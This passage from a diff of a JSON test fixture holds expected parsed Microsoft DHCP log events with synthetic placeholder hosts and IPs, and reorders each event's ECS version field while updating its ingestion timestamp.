] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-686-12: 12,1/6/17,7:11:41,nsequu,10.66.168.154,omm4276.www.example,01:00:5e:44:c4:69", "event": { - "ingested": "2021-06-09T11:57:25.990664500Z" + "ingested": "2021-12-14T14:48:14.226932777Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2230-25: 25,1/20/17,2:14:16,torev,10.214.241.84,ctetura4886.www5.lan,01:00:5e:3a:d0:86,ita,ipi,rsitamet,lupt,xea,qua,luptatev,admi,modocons,elaudant,tinvol", "event": { - "ingested": "2021-06-09T11:57:25.990667900Z" + "ingested": "2021-12-14T14:48:14.226933215Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6103-11018: 11018,2/3/17,9:16:50,lapariat,10.97.38.141,etM953.api.domain,xercitat,lpa,entsu,dun", "event": { - "ingested": "2021-06-09T11:57:25.990671400Z" + "ingested": "2021-12-14T14:48:14.226933576Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-927-58: 58,2/18/17,4:19:24,itaut,10.33.140.180,umdolo7781.api.home,01:00:5e:24:f1:b2", "event": { - "ingested": "2021-06-09T11:57:25.990675Z" + "ingested": "2021-12-14T14:48:14.226933955Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4632-51: 51,3/4/17,11:21:59,fugi,10.119.185.63,imadmini2625.www5.localhost,01:00:5e:31:b9:65,dtem", "event": { - "ingested": "2021-06-09T11:57:25.990678600Z" + "ingested": "2021-12-14T14:48:14.226934308Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5377-50: 50,3/18/17,6:24:33,stl,10.95.193.186,picia6119.mail.host,01:00:5e:60:77:c7,tinvol", "event": { - "ingested": "2021-06-09T11:57:25.990682200Z" + "ingested": "2021-12-14T14:48:14.226934665Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5524-11019: 11019,4/2/17,1:27:07,moenimi,10.17.21.125,inv5716.mail.invalid,sequatur,uidolo,lumquido,nihi", "event": { - "ingested": "2021-06-09T11:57:25.990686800Z" + "ingested": "2021-12-14T14:48:14.226935015Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5841-11021: 11021,4/16/17,8:29:41,nofdeF,10.73.69.75,uines6355.internal.localdomain,estqu,inibusBo,tat,tion", "event": { - "ingested": "2021-06-09T11:57:25.990690200Z" + "ingested": "2021-12-14T14:48:14.226935369Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5705-52: 52,4/30/17,3:32:16,uasia,10.64.70.5,ici3995.lan,01:00:5e:4e:97:83,iscinge,atvol,umiur,imad,msequi", "event": { - "ingested": "2021-06-09T11:57:25.990693900Z" + "ingested": "2021-12-14T14:48:14.226935716Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-1559-11020: 11020,5/14/17,10:34:50,deFinibu,10.45.25.68,rehender4535.www5.test,hil,atquovo,suntinc,xeac", "event": { - "ingested": "2021-06-09T11:57:25.990697500Z" + "ingested": "2021-12-14T14:48:14.226936068Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2228-20: 20,5/29/17,5:37:24,eli,10.28.127.218,pida2286.internal.home,01:00:5e:cc:0b:8f", "event": { - "ingested": "2021-06-09T11:57:25.990701100Z" + "ingested": "2021-12-14T14:48:14.226936538Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-7427-11006: 11006,6/12/17,12:39:58,psaquae,10.68.93.6,mporain2624.www.localhost,iunt,temveleu,colabo,eme", "event": { - "ingested": "2021-06-09T11:57:25.990704700Z" + "ingested": "2021-12-14T14:48:14.226936906Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2991-16: 16,6/26/17,7:42:33,civeli,10.116.104.101,gnam2508.mail.example,01:00:5e:e1:73:47,maccusa", "event": { - "ingested": "2021-06-09T11:57:25.990708300Z" + "ingested": "2021-12-14T14:48:14.226937266Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-3458-11003: 11003,7/11/17,2:45:07,idex,10.192.110.182,tutla2716.www.domain,inesci,serror,aliqu,olupta", "event": { - "ingested": "2021-06-09T11:57:25.990711900Z" + "ingested": "2021-12-14T14:48:14.226937620Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2807-53: 53,7/25/17,9:47:41,ihilm,10.219.84.37,ercit2385.internal.home,01:00:5e:a0:cd:2f,iamquis", "event": { - "ingested": "2021-06-09T11:57:25.990715700Z" + "ingested": "2021-12-14T14:48:14.226937993Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6972-11012: 11012,8/8/17,4:50:15,ittenbyC,10.148.153.201,conseq557.mail.lan,aaliquaU,ntor,lpaqui,sitame", "event": { - "ingested": "2021-06-09T11:57:25.990719200Z" + "ingested": "2021-12-14T14:48:14.226938350Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5040-24: 24,8/22/17,11:52:50,utla,10.103.118.137,oei5200.www5.invalid,01:00:5e:c7:b7:18", "event": { - "ingested": "2021-06-09T11:57:25.990722600Z" + "ingested": "2021-12-14T14:48:14.226938701Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2026-02: 02,9/6/17,6:55:24,nnum,10.137.223.15,adol485.example,01:00:5e:81:99:6f,dol", "event": { - "ingested": "2021-06-09T11:57:25.990726200Z" + "ingested": "2021-12-14T14:48:14.226939057Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4977-11019: 11019,9/20/17,1:57:58,que,10.213.147.241,etconse7424.internal.lan,lit,asun,estia,eaq", "event": { - "ingested": "2021-06-09T11:57:25.990729600Z" + "ingested": "2021-12-14T14:48:14.226939404Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-1180-11010: 11010,10/4/17,9:00:32,serunt,10.183.233.5,tMalor7410.www.localhost,eaq,amest,corp,modtemp", "event": { - "ingested": "2021-06-09T11:57:25.990733100Z" + "ingested": "2021-12-14T14:48:14.226939751Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2628-11013: 11013,10/19/17,4:03:07,tNequepo,10.52.186.29,equat2243.www5.localdomain,ione,ihilmole,eriamea,amre", "event": { - "ingested": "2021-06-09T11:57:25.990736800Z" + "ingested": "2021-12-14T14:48:14.226940102Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2949-11: 11,11/2/17,11:05:41,uptat,10.64.199.102,tmo1835.test,01:00:5e:35:a8:83,fugitse", "event": { - "ingested": "2021-06-09T11:57:25.990758400Z" + "ingested": "2021-12-14T14:48:14.226940459Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-3331-54: 54,11/16/17,6:08:15,etMalor,10.196.143.87,quatD4191.local,01:00:5e:3b:7a:f1,sperna", "event": { - "ingested": "2021-06-09T11:57:25.990764500Z" + "ingested": "2021-12-14T14:48:14.226940809Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-7576-30: 30,12/1/17,1:10:49,tper,10.163.5.243,osqui3661.mail.domain,01:00:5e:1e:d6:07,texp", "event": { - "ingested": "2021-06-09T11:57:25.990769100Z" + "ingested": "2021-12-14T14:48:14.226941161Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5037-11004: 11004,12/15/17,8:13:24,uela,10.194.114.58,ectio2175.www.localhost,ihilmo,radi,gel,lorsitam", "event": { - "ingested": "2021-06-09T11:57:25.990773600Z" + "ingested": "2021-12-14T14:48:14.226941520Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6385-1103: 1103,12/29/17,3:15:58,ris,10.212.42.224,liqui6106.internal.home,amvolu,eturadi,uamei,quisno", "event": { - "ingested": "2021-06-09T11:57:25.990777500Z" + "ingested": "2021-12-14T14:48:14.226941873Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-1747-11011: 11011,1/12/18,10:18:32,aliquam,10.244.144.198,eratv6205.internal.lan,reme,acommod,uaUteni,udantium", "event": { - "ingested": "2021-06-09T11:57:25.990781400Z" + "ingested": "2021-12-14T14:48:14.226942341Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6686-57: 57,1/27/18,5:21:06,stlabo,10.134.192.241,catc6134.localdomain,01:00:5e:5b:99:6c,magnid", "event": { - "ingested": "2021-06-09T11:57:25.990785100Z" + "ingested": "2021-12-14T14:48:14.226942690Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-7582-17: 17,2/10/18,12:23:41,quiratio,10.62.191.18,tevelite245.mail.local,01:00:5e:78:a7:55,gnido", "event": { - "ingested": "2021-06-09T11:57:25.990788500Z" + "ingested": "2021-12-14T14:48:14.226943061Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6036-50: 50,2/24/18,7:26:15,numqua,10.89.22.113,abo1637.mail.host,01:00:5e:ed:c2:f7", "event": { - "ingested": "2021-06-09T11:57:25.990791900Z" + "ingested": "2021-12-14T14:48:14.226943436Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4949-11020: 11020,3/11/18,2:28:49,derit,10.90.86.89,piscin6866.internal.host,uptatema,intocc,liqu,eporr", "event": { - "ingested": "2021-06-09T11:57:25.990795500Z" + "ingested": "2021-12-14T14:48:14.226943795Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6418-59: 59,3/25/18,9:31:24,nofdeFin,10.67.38.204,idex6952.www.localhost,01:00:5e:69:58:0e,ecte,tinvolu,iurer,iciadese,quidolor,tessec,olupta,litse,icabo,itatio,uta", "event": { - "ingested": "2021-06-09T11:57:25.990800600Z" + "ingested": "2021-12-14T14:48:14.226944157Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4824-11010: 11010,4/8/18,4:33:58,volupt,10.158.237.92,riosamn7650.api.test,rcitati,eni,ionevo,ugiatnu", "event": { - "ingested": "2021-06-09T11:57:25.990804300Z" + "ingested": "2021-12-14T14:48:14.226944515Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5368-60: 60,4/22/18,11:36:32,mnisi,10.107.168.60,ehen7519.www5.lan,01:00:5e:a7:ac:70,stquido,ommodico,ptas,pta,tetu", "event": { - "ingested": "2021-06-09T11:57:25.990808Z" + "ingested": "2021-12-14T14:48:14.226944872Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5740-24: 24,5/7/18,6:39:06,Nequepo,10.207.201.9,boree513.www.corp,01:00:5e:e2:17:79,reetdolo,smo,etcons,iusmodi,uamest", "event": { - "ingested": "2021-06-09T11:57:25.990811500Z" + "ingested": "2021-12-14T14:48:14.226945298Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-1842-11023: 11023,5/21/18,1:41:41,epte,10.20.147.134,aper5651.test,roi,niamqui,orem,sno", "event": { - "ingested": "2021-06-09T11:57:25.990815100Z" + "ingested": "2021-12-14T14:48:14.226945660Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5263-11007: 11007,6/4/18,8:44:15,saute,10.213.145.202,inventor6088.www.invalid,quamni,iatisu,sec,cons", "event": { - "ingested": "2021-06-09T11:57:25.990818600Z" + "ingested": "2021-12-14T14:48:14.226946009Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-510-20: 20,6/19/18,3:46:49,tae,10.14.81.228,aperiame1458.www5.local,01:00:5e:7e:22:1b", "event": { - "ingested": "2021-06-09T11:57:25.990825300Z" + "ingested": "2021-12-14T14:48:14.226946364Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4410-11003: 11003,7/3/18,10:49:23,itinvol,10.76.10.73,cipitlab6201.www5.example,ios,evolu,ersp,tquov", "event": { - "ingested": "2021-06-09T11:57:25.990828800Z" + "ingested": "2021-12-14T14:48:14.226946736Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4554-01: 01,7/17/18,5:51:58,osquira,10.220.5.143,com5308.api.domain,01:00:5e:55:ee:a4,reetdolo,norum,madmi,uidol,mporin", "event": { - "ingested": "2021-06-09T11:57:25.990832300Z" + "ingested": "2021-12-14T14:48:14.226947082Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-3253-ID: ID,8/1/18,12:54:32,roid,10.226.199.190,Nemoenim2039.api.localhost,01:00:5e:f6:ba:65", "event": { - "ingested": "2021-06-09T11:57:25.990835700Z" + "ingested": "2021-12-14T14:48:14.226947447Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-1394-11000: 11000,8/15/18,7:57:06,itessequ,10.20.129.206,iquipe2458.api.host,modtemp,quovol,nve,remag", "event": { - "ingested": "2021-06-09T11:57:25.990839100Z" + "ingested": "2021-12-14T14:48:14.226947800Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5983-56: 56,8/29/18,2:59:40,tquiin,10.174.176.36,ovol3674.www5.host,01:00:5e:bb:1d:bf,str,idolore,pid,illoin,tanimid,umdo,natuse,gnamal,metMalo,ntexplic,archite", "event": { - "ingested": "2021-06-09T11:57:25.990842600Z" + "ingested": "2021-12-14T14:48:14.226948153Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-7829-32: 32,9/12/18,10:02:15,asi,10.94.38.110,nisist2752.home,01:00:5e:c1:3c:48,exercita", "event": { - "ingested": "2021-06-09T11:57:25.990846Z" + "ingested": "2021-12-14T14:48:14.226948514Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2516-11007: 11007,9/27/18,5:04:49,oremeu,10.22.110.210,intoc1426.mail.lan,eeufugia,evit,runtm,molli", "event": { - "ingested": "2021-06-09T11:57:25.990849500Z" + "ingested": "2021-12-14T14:48:14.226948876Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-543-11006: 11006,10/11/18,12:07:23,eturadi,10.218.87.174,rsitvolu3751.mail.lan,olor,ineavo,pexe,niamqui", "event": { - "ingested": "2021-06-09T11:57:25.990870500Z" + "ingested": "2021-12-14T14:48:14.226949233Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6846-11014: 11014,10/25/18,7:09:57,adeser,10.140.113.244,tqu4367.www5.localhost,quam,quid,fugiat,atisun", "event": { - "ingested": "2021-06-09T11:57:25.990877100Z" + "ingested": "2021-12-14T14:48:14.226949597Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-7741-1103: 1103,11/9/18,2:12:32,dmin,10.159.181.29,inci5738.www5.invalid,rnatur,ofdeFin,essequam,acommo", "event": { - "ingested": "2021-06-09T11:57:25.990881700Z" + "ingested": "2021-12-14T14:48:14.226949954Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-18-11005: 11005,11/23/18,9:15:06,cusant,10.178.173.128,itecto1300.internal.corp,tut,ercita,ciadeser,emquia", "event": { - "ingested": "2021-06-09T11:57:25.990886100Z" + "ingested": "2021-12-14T14:48:14.226950315Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6789-11015: 11015,12/7/18,4:17:40,uia,10.217.38.30,siut1579.www.domain,eFi,mexe,its,ender", "event": { - "ingested": "2021-06-09T11:57:25.990889900Z" + "ingested": "2021-12-14T14:48:14.226950667Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-1540-11014: 11014,12/21/18,11:20:14,edic,10.178.49.161,ame6223.www5.localhost,meius,billo,labo,oNemoeni", "event": { - "ingested": "2021-06-09T11:57:25.990893800Z" + "ingested": "2021-12-14T14:48:14.226951149Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2244-32: 32,1/5/19,6:22:49,stenatu,10.215.205.216,ratv5227.www.invalid,01:00:5e:fd:3d:c2,nts", "event": { - "ingested": "2021-06-09T11:57:25.990897400Z" + "ingested": "2021-12-14T14:48:14.226951563Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5663-11025: 11025,1/19/19,1:25:23,ano,10.175.103.215,aturve1647.mail.localhost,uunturm,temUte,sit,olab", "event": { - "ingested": "2021-06-09T11:57:25.990901Z" + "ingested": "2021-12-14T14:48:14.226951919Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6672-12: 12,2/2/19,8:27:57,enderi,10.236.150.115,umwrit5433.www5.domain,01:00:5e:ba:09:4a,tpersp", "event": { - "ingested": "2021-06-09T11:57:25.990906300Z" + "ingested": "2021-12-14T14:48:14.226953653Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6797-01: 01,2/17/19,3:30:32,oeni,10.223.90.192,llamco7206.www.home,01:00:5e:8f:35:71,orsit,asiar,ise,itau,apariat", "event": { - "ingested": "2021-06-09T11:57:25.990910200Z" + "ingested": "2021-12-14T14:48:14.226954061Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4494-51: 51,3/3/19,10:33:06,dolore,10.165.192.48,nBCSedut1502.www5.example,01:00:5e:c7:c2:10,odoconse,emp,pisciv,lumdolor,nonp,labo,ulapar,aboreetd,hilm,llitanim,invo", "event": { - "ingested": "2021-06-09T11:57:25.990914200Z" + "ingested": "2021-12-14T14:48:14.226954415Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-7205-50: 50,3/17/19,5:35:40,ama,10.80.152.108,texpli2782.mail.domain,01:00:5e:27:0a:9d,", "event": { - "ingested": "2021-06-09T11:57:25.990917700Z" + "ingested": "2021-12-14T14:48:14.226954775Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5224-11011: 11011,4/1/19,12:38:14,liqua,10.192.21.74,aco6894.mail.home,emUteni,rum,gnaaliqu,teirured", "event": { - "ingested": "2021-06-09T11:57:25.990921600Z" + "ingested": "2021-12-14T14:48:14.226955138Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5608-11019: 11019,4/15/19,7:40:49,bor,10.142.25.100,tetu2485.internal.invalid,nby,mve,osqui,sequat", "event": { - "ingested": "2021-06-09T11:57:25.990925300Z" + "ingested": "2021-12-14T14:48:14.226955492Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-3051-1098: 1098,4/29/19,2:43:23,ven,10.162.114.217,doloreme60.www5.localhost,evitaed,inimveni,dex,lor", "event": { - "ingested": "2021-06-09T11:57:25.990928800Z" + "ingested": "2021-12-14T14:48:14.226955844Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2315-01: 01,5/13/19,9:45:57,amcorp,10.57.57.241,liqua6498.api.invalid,01:00:5e:d8:53:15,iduntu,ccaeca,niamq,lapariat,remagn,mquae,consequa,moenimi,olupt,oconsequ,edquiac", "event": { - "ingested": "2021-06-09T11:57:25.990932400Z" + "ingested": "2021-12-14T14:48:14.226956193Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2690-14: 14,5/28/19,4:48:31,quamest,10.152.28.171,rsita2628.www5.local,01:00:5e:7a:4c:6e,miu", "event": { - "ingested": "2021-06-09T11:57:25.990935900Z" + "ingested": "2021-12-14T14:48:14.226956545Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6444-11001: 11001,6/11/19,11:51:06,mex,10.0.132.176,luptat7214.domain,lillum,remips,uisaute,imide", "event": { - "ingested": "2021-06-09T11:57:25.990939300Z" + "ingested": "2021-12-14T14:48:14.226956899Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-7037-11: 11,6/25/19,6:53:40,itesseq,10.125.134.213,tpersp2624.mail.example,01:00:5e:0b:fb:4a", "event": { - "ingested": "2021-06-09T11:57:25.990942500Z" + "ingested": "2021-12-14T14:48:14.226957258Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6392-64: 64,7/10/19,1:56:14,mvolu,10.206.96.56,aincidu2687.mail.home,01:00:5e:80:9d:2c,", "event": { - "ingested": "2021-06-09T11:57:25.990946200Z" + "ingested": "2021-12-14T14:48:14.226957627Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5524-1098: 1098,7/24/19,8:58:48,lupta,10.22.187.69,amcor5091.internal.corp,nbyCi,tevel,usc,rem", "event": { - "ingested": "2021-06-09T11:57:25.990949600Z" + "ingested": "2021-12-14T14:48:14.226957988Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-1978-11019: 11019,8/7/19,4:01:23,atisund,10.2.128.234,ncidid5410.internal.domain,velite,teturad,perspici,itation", "event": { - "ingested": "2021-06-09T11:57:25.990953200Z" + "ingested": "2021-12-14T14:48:14.226958345Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5469-11024: 11024,8/21/19,11:03:57,porincid,10.223.160.140,nofd988.api.example,ilmol,eri,quunt,olori", "event": { - "ingested": "2021-06-09T11:57:25.990956700Z" + "ingested": "2021-12-14T14:48:14.226958844Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2-11004: 11004,9/5/19,6:06:31,elit,10.137.14.180,borisnis6159.www5.localdomain,inven,eufugi,accusant,onse", "event": { - "ingested": "2021-06-09T11:57:25.990960200Z" + "ingested": "2021-12-14T14:48:14.226959344Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2859-59: 59,9/19/19,1:09:05,inibu,10.106.93.26,isetquas3096.home,01:00:5e:1b:92:a6", "event": { - "ingested": "2021-06-09T11:57:25.990963700Z" + "ingested": "2021-12-14T14:48:14.226959934Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4924-11025: 11025,10/3/19,8:11:40,periam,10.192.182.230,dminima4348.mail.home,tame,naaliq,nte,ulpa", "event": { - "ingested": "2021-06-09T11:57:25.990967200Z" + "ingested": "2021-12-14T14:48:14.226960376Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-1738-25: 25,10/18/19,3:14:14,loi,10.24.111.229,volupt2952.api.local,01:00:5e:64:62:d1,sequat,giatquov,tconsec,miurerep,toccaec,fugi,labo,nostrud,gnaal,qui,cupi", "event": { - "ingested": "2021-06-09T11:57:25.990970800Z" + "ingested": "2021-12-14T14:48:14.226960746Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5282-60: 60,11/1/19,10:16:48,lores,10.45.253.103,uii5923.internal.home,01:00:5e:2f:ff:49,rcit,llamco,atu,untincul,ssecil", "event": { - "ingested": "2021-06-09T11:57:25.990974200Z" + "ingested": "2021-12-14T14:48:14.226961104Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-3023-11023: 11023,11/15/19,5:19:22,atise,10.95.241.28,oluptas6981.www5.localhost,lor,Sedut,yCiceroi,quunt", "event": { - "ingested": "2021-06-09T11:57:25.990977700Z" + "ingested": "2021-12-14T14:48:14.226961485Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4890-23: 23,11/30/19,12:21:57,dolore,10.84.32.178,vitaed4959.example,01:00:5e:11:45:1e,itaedict", "event": { - "ingested": "2021-06-09T11:57:25.990981800Z" + "ingested": "2021-12-14T14:48:14.226961907Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4271-55: 55,12/14/19,7:24:31,ruredo,10.72.196.74,boreetdo1725.example,01:00:5e:01:2f:7d", "event": { - "ingested": "2021-06-09T11:57:25.990985700Z" + "ingested": 